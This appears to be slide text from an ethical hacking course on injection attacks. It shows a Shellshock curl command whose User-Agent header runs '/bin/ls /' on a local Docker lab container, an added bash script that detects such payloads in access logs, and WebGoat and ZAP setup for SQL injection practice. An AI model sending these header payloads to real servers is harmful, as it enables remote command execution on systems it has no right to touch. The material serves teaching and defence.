IT 4510 : Ethical Hacking
Injections
Dr Joe Francom
Command Injection
- Shellshock
- Example:
docker run -d --rm -p 8888:80 joelongtoe/shellshock-example
curl -A '() { :;}; echo "Content-Type: text/plain"; echo; /bin/ls /' http://127.0.0.1:8888/cgi-bin/welcome.sh
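- You can view the contents of that welcome script, which lives inside the container:
cat /usr/lib/cgi-bin/welcome.sh
- For example, from the host (pensive_mendeleev is the name Docker generated for the container; use the name shown by docker ps):
docker exec pensive_mendeleev /bin/cat /usr/lib/cgi-bin/welcome.sh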
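An added example, not part of the original slides: the curl request above delivers its payload in a header value that begins with `() {`, so a defender can look for a quoted field starting with that string in a combined-format access log. The log lines are constructed and the function names `sample_log` and `shellshock_hits` are assumptions.

```shell
#!/usr/bin/env bash
# Added example: flag Shellshock-style header values in a combined-format
# access log (Referer and User-Agent are the two trailing quoted fields).

# Constructed sample log using documentation IP ranges, not real traffic.
# Apache writes embedded double quotes as \" in logged header values.
sample_log() {
cat <<'EOF'
192.0.2.10 - - [01/Oct/2014:10:00:01 +0000] "GET /cgi-bin/welcome.sh HTTP/1.1" 200 120 "-" "curl/7.38.0"
198.51.100.7 - - [01/Oct/2014:10:00:05 +0000] "GET /cgi-bin/welcome.sh HTTP/1.1" 200 512 "-" "() { :;}; echo \"Content-Type: text/plain\"; echo; /bin/ls /"
203.0.113.4 - - [01/Oct/2014:10:00:09 +0000] "GET /index.html HTTP/1.1" 200 300 "() { :;}; echo; /bin/ls /" "Mozilla/5.0"
192.0.2.10 - - [01/Oct/2014:10:00:12 +0000] "GET /docs/bash.html HTTP/1.1" 200 900 "-" "Mozilla/5.0 (notes on f() { } syntax)"
EOF
}

# Print "client_ip request_path" for every log line in which a quoted field
# starts with the bash function-definition prefix "() {".
# Reads the files given as arguments, or stdin when none are given.
# Matching only at the start of a quoted field (the leading ") avoids
# flagging values that merely mention "() {" somewhere in the middle.
shellshock_hits() {
    grep -hF -- '"() {' "$@" | awk '{ print $1, $7 }'
}

# Stand-alone run over the constructed sample.
sample_log | shellshock_hits
```

A hit on a path outside /cgi-bin/ (the third sample line) is still worth recording as a probe, even though a static page does not pass headers to bash.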
SQL Injection
Zap and Goat
docker run --rm -d -p 127.0.0.1:8080:8080 -p 127.0.0.1:9090:9090 -e TZ=America/Boise webgoat/goatandwolf
sudo apt install zaproxy